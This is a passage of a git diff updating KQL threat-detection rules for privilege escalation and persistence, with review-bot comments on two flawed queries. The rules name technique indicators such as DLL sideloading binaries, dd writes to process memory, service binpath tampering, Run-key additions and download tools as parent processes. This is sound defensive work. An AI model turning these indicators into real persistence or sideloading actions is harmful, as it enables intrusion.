@@ -1,12 +1,12 @@ -// Title: Persistence Via Cron Files -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC -// Date: 2021-10-15 -// Level: medium -// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 -// False Positives: -// - Any legitimate cron file. - -DeviceFileEvents +// Title: Persistence Via Cron Files +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: medium +// Description: Detects creation of cron file or files in Cron directories which could indicates potential persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 +// False Positives: +// - Any legitimate cron file. + +DeviceFileEvents | where (FolderPath startswith "/etc/cron.d/" or FolderPath startswith "/etc/cron.daily/" or FolderPath startswith "/etc/cron.hourly/" or FolderPath startswith "/etc/cron.monthly/" or FolderPath startswith "/etc/cron.weekly/" or FolderPath startswith "/var/spool/cron/crontabs/") or (FolderPath contains "/etc/cron.allow" or FolderPath contains "/etc/cron.deny" or FolderPath contains "/etc/crontab") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql index fed1a190..ec5d0c5b 100644 --- a/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql +++ b/KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql 
@@ -1,12 +1,12 @@ -// Title: Persistence Via Sudoers Files -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-05 -// Level: medium -// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 -// False Positives: -// - Creation of legitimate files in sudoers.d folder part of administrator work - -DeviceFileEvents +// Title: Persistence Via Sudoers Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-05 +// Level: medium +// Description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.003 +// False Positives: +// - Creation of legitimate files in sudoers.d folder part of administrator work + +DeviceFileEvents | where FolderPath startswith "/etc/sudoers.d/" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql index 03fea458..0c6a79b8 100644 --- a/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql +++ b/KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql 
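Review bot: The header says the rule covers the sudoers file as well as `sudoers.d`, but the query only has `FolderPath startswith "/etc/sudoers.d/"`, so changes to `/etc/sudoers` itself are not caught. Either extend it to `FolderPath startswith "/etc/sudoers.d/" or FolderPath == "/etc/sudoers"` or tighten the description to match the query; `persiste` in the description is also a typo for `persist`.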
@@ -1,12 +1,12 @@ -// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry -// Author: Kutepov Anton, oscd.community -// Date: 2019-10-23 -// Level: medium -// Description: Detects COM object hijacking via TreatAs subkey -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 -// False Positives: -// - Maybe some system utilities in rare cases use linking keys for backward compatibility - -DeviceRegistryEvents +// Title: Potential COM Object Hijacking Via TreatAs Subkey - Registry +// Author: Kutepov Anton, oscd.community +// Date: 2019-10-23 +// Level: medium +// Description: Detects COM object hijacking via TreatAs subkey +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015 +// False Positives: +// - Maybe some system utilities in rare cases use linking keys for backward compatibility + +DeviceRegistryEvents | where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*" and RegistryKey contains "\\TreatAs")) and (not(InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\svchost.exe")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql index b126ae78..f6d7fa30 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql 
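Review bot: The main predicate can never be satisfied: `RegistryKey endswith "HKU*" and RegistryKey endswith "Classes\\CLSID*"` asks the same key to end with two different strings, and the trailing `*` is a literal character to KQL `endswith`, so this rule never fires — a silent gap rather than a noisy one. The intended shape is presumably a hive prefix plus two substrings, e.g. `RegistryKey startswith "HKEY_USERS\\" and RegistryKey contains "\\Classes\\CLSID\\" and RegistryKey contains "\\TreatAs"`. Note that MDE spells hives out (`HKEY_USERS`, `HKEY_CURRENT_USER`) rather than `HKU`, so whichever prefix is used should be checked against a real `DeviceRegistryEvents` row before the rule is trusted.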
@@ -1,10 +1,10 @@ -// Title: Potential DLL Injection Or Execution Using Tracker.exe -// Author: Avneet Singh @v3t0_, oscd.community -// Date: 2020-10-18 -// Level: medium -// Description: Detects potential DLL injection and execution using "Tracker.exe" -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001 - -DeviceProcessEvents +// Title: Potential DLL Injection Or Execution Using Tracker.exe +// Author: Avneet Singh @v3t0_, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects potential DLL injection and execution using "Tracker.exe" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.001 + +DeviceProcessEvents | where ((ProcessCommandLine contains " /d " or ProcessCommandLine contains " /c ") and (FolderPath endswith "\\tracker.exe" or ProcessVersionInfoFileDescription =~ "Tracker")) and (not((ProcessCommandLine contains " /ERRORREPORT:PROMPT " or (InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\MSBuild.exe" or InitiatingProcessFolderPath endswith "\\Msbuild\\Current\\Bin\\amd64\\MSBuild.exe")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql index fe67df0a..071a7635 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of DbgModel.DLL -// Author: Gary Lobermier -// Date: 2024-07-11 -// Level: medium -// Description: Detects potential DLL sideloading of "DbgModel.dll" -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of DbgModel.DLL +// Author: Gary Lobermier +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "DbgModel.dll" +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule + +DeviceImageLoadEvents | where FolderPath endswith "\\dbgmodel.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not((FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_" or (FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql index 259d82d6..8bcf8538 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of MpSvc.DLL -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema -// Date: 2024-07-11 -// Level: medium -// Description: Detects potential DLL sideloading of "MpSvc.dll". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule. - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of MpSvc.DLL +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "MpSvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents | where FolderPath endswith "\\MpSvc.dll" and (not((FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql index 9669b6a4..891cc995 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Of MsCorSvc.DLL -// Author: Wietze Beukema -// Date: 2024-07-11 -// Level: medium -// Description: Detects potential DLL sideloading of "mscorsvc.dll". -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Legitimate applications loading their own versions of the DLL mentioned in this rule. - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Of MsCorSvc.DLL +// Author: Wietze Beukema +// Date: 2024-07-11 +// Level: medium +// Description: Detects potential DLL sideloading of "mscorsvc.dll". +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLL mentioned in this rule. + +DeviceImageLoadEvents | where FolderPath endswith "\\mscorsvc.dll" and (not((FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql index ee418ee3..fa36580e 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql 
@@ -1,10 +1,10 @@ -// Title: Potential DLL Sideloading Using Coregen.exe -// Author: frack113 -// Date: 2022-12-31 -// Level: medium -// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055 - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Using Coregen.exe +// Author: frack113 +// Date: 2022-12-31 +// Level: medium +// Description: Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.t1055 + +DeviceImageLoadEvents | where InitiatingProcessFolderPath endswith "\\coregen.exe" and (not((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Program Files\\Microsoft Silverlight\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql index 1016a14b..60eff39e 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql 
@@ -1,11 +1,11 @@ -// Title: Potential DLL Sideloading Via DeviceEnroller.EXE -// Author: @gott_cyber -// Date: 2022-08-29 -// Level: medium -// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". -// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 - -DeviceProcessEvents +// Title: Potential DLL Sideloading Via DeviceEnroller.EXE +// Author: @gott_cyber +// Date: 2022-08-29 +// Level: medium +// Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". +// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 + +DeviceProcessEvents | where ProcessCommandLine contains "/PhoneDeepLink" and (FolderPath endswith "\\deviceenroller.exe" or ProcessVersionInfoOriginalFileName =~ "deviceenroller.exe") \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql index afa1f482..f0e46043 100644 --- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql +++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql 
@@ -1,12 +1,12 @@ -// Title: Potential DLL Sideloading Via VMware Xfer -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-02 -// Level: high -// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Potential DLL Sideloading Via VMware Xfer +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-02 +// Level: high +// Description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where (FolderPath endswith "\\glib-2.0.dll" and InitiatingProcessFolderPath endswith "\\VMwareXferlogs.exe") and (not(FolderPath startswith "C:\\Program Files\\VMware\\")) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql index 20104c27..1337b527 100644 --- a/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql +++ b/KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql 
@@ -1,10 +1,10 @@ -// Title: Potential Initial Access via DLL Search Order Hijacking -// Author: Tim Rauch (rule), Elastic (idea) -// Date: 2022-10-21 -// Level: medium -// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion - -DeviceFileEvents +// Title: Potential Initial Access via DLL Search Order Hijacking +// Author: Tim Rauch (rule), Elastic (idea) +// Date: 2022-10-21 +// Level: medium +// Description: Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. 
+// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1566, attack.t1566.001, attack.initial-access, attack.t1574, attack.t1574.001, attack.defense-evasion + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.EXE" or InitiatingProcessFolderPath endswith "\\fltldr.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\certutil.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\Microsoft\\OneDrive\\" or FolderPath contains "\\Microsoft OneDrive\\" or FolderPath contains "\\Microsoft\\Teams\\" or FolderPath contains "\\Local\\slack\\app-" or FolderPath contains "\\Local\\Programs\\Microsoft VS Code\\") and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\") and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\cmd.exe" and (FolderPath contains "\\Users\\" and FolderPath contains "\\AppData\\" and FolderPath contains "\\Microsoft\\OneDrive\\" and FolderPath contains "\\api-ms-win-core-")))) \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql index 4751f88a..448dc75f 100644 --- a/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql 
+++ b/KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql @@ -1,10 +1,10 @@ -// Title: Potential Linux Process Code Injection Via DD Utility -// Author: Joseph Kamau -// Date: 2023-12-01 -// Level: medium -// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. -// MITRE Tactic: Privilege Escalation -// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009 - -DeviceProcessEvents +// Title: Potential Linux Process Code Injection Via DD Utility +// Author: Joseph Kamau +// Date: 2023-12-01 +// Level: medium +// Description: Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.009 + +DeviceProcessEvents | where (ProcessCommandLine contains "of=" and ProcessCommandLine contains "/proc/" and ProcessCommandLine contains "/mem") and FolderPath endswith "/dd" \ No newline at end of file diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql index c84c2e75..37e3c542 100644 --- a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql +++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql 
@@ -1,12 +1,12 @@
-// Title: Potential Mpclient.DLL Sideloading
-// Author: Bhabesh Raj
-// Date: 2022-08-02
-// Level: high
-// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential Mpclient.DLL Sideloading
+// Author: Bhabesh Raj
+// Date: 2022-08-02
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (FolderPath endswith "\\mpclient.dll" and (InitiatingProcessFolderPath endswith "\\MpCmdRun.exe" or InitiatingProcessFolderPath endswith "\\NisSrv.exe")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
index 04c13655..41ff65ca 100644
--- a/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
+++ b/KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
@@ -1,12 +1,12 @@
-// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries
-// Author: Bhabesh Raj
-// Date: 2022-08-01
-// Level: high
-// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries
+// Author: Bhabesh Raj
+// Date: 2022-08-01
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql
index a138f10c..247d9a52 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Attempt Via Existing Service Tampering
-// Author: Sreeman
-// Date: 2020-09-29
-// Level: medium
-// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011
-
-DeviceProcessEvents
+// Title: Potential Persistence Attempt Via Existing Service Tampering
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add 
" and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
index e89c136c..81b5797b 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
@@ -1,14 +1,14 @@
-// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
-// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2021-06-28
-// Level: medium
-// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
-// False Positives:
-// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
-// - Legitimate administrator sets up autorun keys for legitimate reasons.
-// - Discord
-
-DeviceProcessEvents
+// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-06-28
+// Level: medium
+// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+// - Legitimate administrator sets up autorun keys for legitimate reasons.
+// - Discord
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql
index 10361e4b..db9f023f 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Using DebugPath
-// Author: frack113
-// Date: 2022-07-27
-// Level: medium
-// Description: Detects potential persistence using Appx DebugPath
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
-
-DeviceRegistryEvents
+// Title: Potential Persistence Using DebugPath
+// Author: frack113
+// Date: 2022-07-27
+// Level: medium
+// Description: Detects potential persistence using Appx DebugPath
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.015
+
+DeviceRegistryEvents
 | where (RegistryKey contains "Classes\\ActivatableClasses\\Package\\Microsoft." and RegistryKey endswith "\\DebugPath") or (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft." and RegistryKey endswith "\\(Default)")
\ No newline at end of file
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
index be2ef769..f8a9409c 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
@@ -1,15 +1,15 @@
-// Title: Potential Persistence Via App Paths Default Property
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-10
-// Level: high
-// Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
-// The entries found under App Paths are used primarily for the following purposes.
-// First, to map an application's executable file name to that file's fully qualified path.
-// Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
-// MITRE Tactic: Privilege Escalation
-// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012
-// False Positives:
-// - Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)
-
-DeviceRegistryEvents
